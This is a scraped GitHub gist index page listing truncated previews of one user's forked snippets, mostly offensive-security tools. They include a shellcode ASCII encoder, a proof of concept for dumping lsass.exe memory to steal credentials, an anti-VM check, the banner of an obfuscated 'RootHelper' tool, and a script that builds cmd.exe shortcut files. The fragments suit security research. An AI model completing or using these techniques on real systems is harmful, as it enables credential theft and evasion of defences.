wonderkun
wonderkun
/ ascii-shellcode-encoder.py
Created
September 12, 2024 06:52
— forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
wonderkun
/ scc-built-in.h
Created
July 30, 2024 07:20
— forked from psifertex/scc-built-in.h
list of built-in functions available via SCC on windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| CloseHandle(HANDLE handle) __import("kernel32"); | |
| CreateDirectoryA(const char* name, void* security) __import("kernel32"); | |
| CreateFileA(const char* name, uint32_t access, uint32_t share, void* security, uint32_t disposition, | |
| CreateFileMappingA(HANDLE file, void* security, uint32_t prot, | |
| CreatePipe(HANDLE* read, HANDLE* write, void* security, uint32_t size) __import("kernel32"); | |
| CreateProcessA(const char* app, const char* cmdline, void* processAttr, void* threadAttr, | |
| DeleteFileA(const char* name) __import("kernel32"); | |
| ExitProcess(uint32_t exitCode) __import("kernel32") __noreturn; | |
| FindClose(HANDLE find) __import("kernel32"); | |
| FindFirstFileA(const char* name, WIN32_FIND_DATAA* data) __import("kernel32"); |
wonderkun
/ windows_and_office_kms_setup.adoc
Created
September 1, 2023 03:26
— forked from jerodg/windows_and_office_kms_setup.adoc
Activate Windows and Office Using KMS Server
wonderkun
/ winfork.c
Created
December 23, 2022 06:15
— forked from juntalis/winfork.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * fork.c | |
| * Experimental fork() on Windows. Requires NT 6 subsystem or | |
| * newer. | |
| * | |
| * Copyright (c) 2012 William Pitcock <[email protected]> | |
| * | |
| * Permission to use, copy, modify, and/or distribute this software for any | |
| * purpose with or without fee is hereby granted, provided that the above | |
| * copyright notice and this permission notice appear in all copies. |
wonderkun
/ refl.cpp
Created
December 23, 2022 03:30
— forked from GeneralTesler/refl.cpp
PoC using RtlCreateProcessReflection + MiniDumpWriteDump to dump lsass.exe process memory
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <iostream> | |
| #include <DbgHelp.h> | |
| #include <processsnapshot.h> | |
| #include <TlHelp32.h> | |
| #include <processthreadsapi.h> | |
| //process reflection stuff copied from: https://github.com/hasherezade/pe-sieve/blob/master/utils/process_reflection.cpp | |
| //minidump/process searching copied from: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass | |
| //compile using: cl.exe refl.cpp /DUNICODE |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from socket import inet_aton | |
| from struct import unpack | |
| from flask import Flask | |
| import requests | |
| import re | |
| app = Flask(__name__) |
wonderkun
/ MSAcpi_ThermalZoneTemperature.ps1
Created
January 26, 2022 02:58
— forked from teixeira0xfffff/MSAcpi_ThermalZoneTemperature.ps1
Anti-VM Techniques with MSAcpi_ThermalZoneTemperature
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-AntiVMwithTemperature { | |
| $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi" | |
| $valorTempKelvin = $t.CurrentTemperature / 10 | |
| $valorTempCelsius = $valorTempKelvin - 273.15 | |
| $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32 | |
| return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K" | |
| } |
wonderkun
/ RootHelper.x.c
Created
July 22, 2021 02:44
— forked from NullArray/RootHelper.x.c
RootHelper Obfuscated, Encrypted, Converted to C source
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //#____ ____ __ | |
| //#\ \ / /____ _____/ |_ ___________ | |
| //# \ Y // __ \_/ ___\ __\/ _ \_ __ \ | |
| //# \ /\ ___/\ \___| | ( <_> ) | \/ | |
| //# \___/ \___ >\___ >__| \____/|__| | |
| //# \/ \/ | |
| //#--Licensed under GNU GPL 3 | |
| //#----Authored by Vector/NullArray | |
| //############################################### |
wonderkun
/ gist:cbddf55520776fea00375d4404eee476
Created
November 5, 2020 14:04
— forked from idiom/gist:7bf970f704c2f5e9b2cec825ded91df6
Ida 7.4 Python 3 Error
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| `C:\Program Files\IDA Pro 7.4\python\3\idc.py:5121: SyntaxWarning: "is not" with a literal. Did you mean "!="? | |
| if newtype is not '':` | |
| --- FIX --- | |
| To resolve the above error change line 5121 to | |
| `if newtype is not None:` | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // 可以遍历 shell32.dll的参数可以获取各种不一样的图表。 好像还可以指定自己的图表,但是没有测试出来。 | |
| write-host "shutcut $($args[0]), and file name $($args[0])" | |
| $file = Get-Content "C:\Users\wonderkun\Desktop\1.txt" | |
| $WshShell = New-Object -comObject WScript.Shell | |
| $Shortcut = $WshShell.CreateShortcut("C:\Users\wonderkun\Desktop\test\$($args[0]).lnk") | |
| $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" | |
| $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,$($args[0])" | |
| $Shortcut.Arguments = ' '+ $file | |
| $Shortcut.Save() |
NewerOlder